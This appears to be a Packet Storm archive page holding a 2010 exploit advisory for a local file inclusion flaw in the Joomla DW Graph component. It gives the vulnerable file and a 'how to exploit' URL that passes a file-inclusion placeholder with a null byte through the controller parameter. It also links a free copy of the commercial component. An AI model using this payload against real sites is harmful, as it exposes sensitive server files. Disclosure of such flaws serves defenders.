we care because you do

Joomla DW Graph Local File Inclusion

Joomla DW Graph Local File Inclusion
Posted Apr 1, 2010
Authored by Chip D3 Bi0s

The Joomla DW Graph component suffers from a local file inclusion vulnerability.

tags | exploit, local, file inclusion
MD5 | 82fafe1c5d3b3b48edaf4a3b5314048c

Joomla DW Graph Local File Inclusion

Change Mirror Download
---------------------------------------------------------------------------------
Joomla Component DW Graph Local File Inclusion
---------------------------------------------------------------------------------

Author : Chip D3 Bi0s
Group : LatinHackTeam
Email & msn : chipdebios@gmail.com
Date : 31 March 2010
Critical Lvl : Moderate
Impact : Exposure of sensitive information
Where : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~


Application : DW Graph Component
Developer : DecryptWeb
License : GPL type : Commercial
Price : $5.00
Date Added : 25 March 2010
Download : http://shop.decryptweb.com/extensions/joomla/graph-component.html
my gift (free) : http://rapidshare.com/files/370201416/dwgraphs_unzipfirst.zip.html
Demo : http://demo.decryptweb.com/joomla/dwgraphs


Description :

DW Graph Component is a Joomla 1.5 native component
for displaying graphs. With this component you can
input numerical values with the help of CSV file and
can show graphical representation of the input data
in the site frontend. Various parameters can be configured
for display of graph.

---------------------------------------------------------------------------

file error : /components/com_dwgraphs/dwgraphs.php

how to exploit

http://127.0.0.1/index.php?option=com_dwgraphs&controller={lfi}%00


+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2012

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    37 Files
  • 2
    May 2nd
    53 Files
  • 3
    May 3rd
    33 Files
  • 4
    May 4th
    4 Files
  • 5
    May 5th
    10 Files
  • 6
    May 6th
    17 Files
  • 7
    May 7th
    19 Files
  • 8
    May 8th
    36 Files
  • 9
    May 9th
    34 Files
  • 10
    May 10th
    35 Files
  • 11
    May 11th
    20 Files
  • 12
    May 12th
    18 Files
  • 13
    May 13th
    11 Files
  • 14
    May 14th
    27 Files
  • 15
    May 15th
    58 Files
  • 16
    May 16th
    54 Files
  • 17
    May 17th
    25 Files
  • 18
    May 18th
    53 Files
  • 19
    May 19th
    9 Files
  • 20
    May 20th
    15 Files
  • 21
    May 21st
    25 Files
  • 22
    May 22nd
    32 Files
  • 23
    May 23rd
    35 Files
  • 24
    May 24th
    26 Files
  • 25
    May 25th
    25 Files
  • 26
    May 26th
    11 Files
  • 27
    May 27th
    8 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2012 Packet Storm. All rights reserved.

close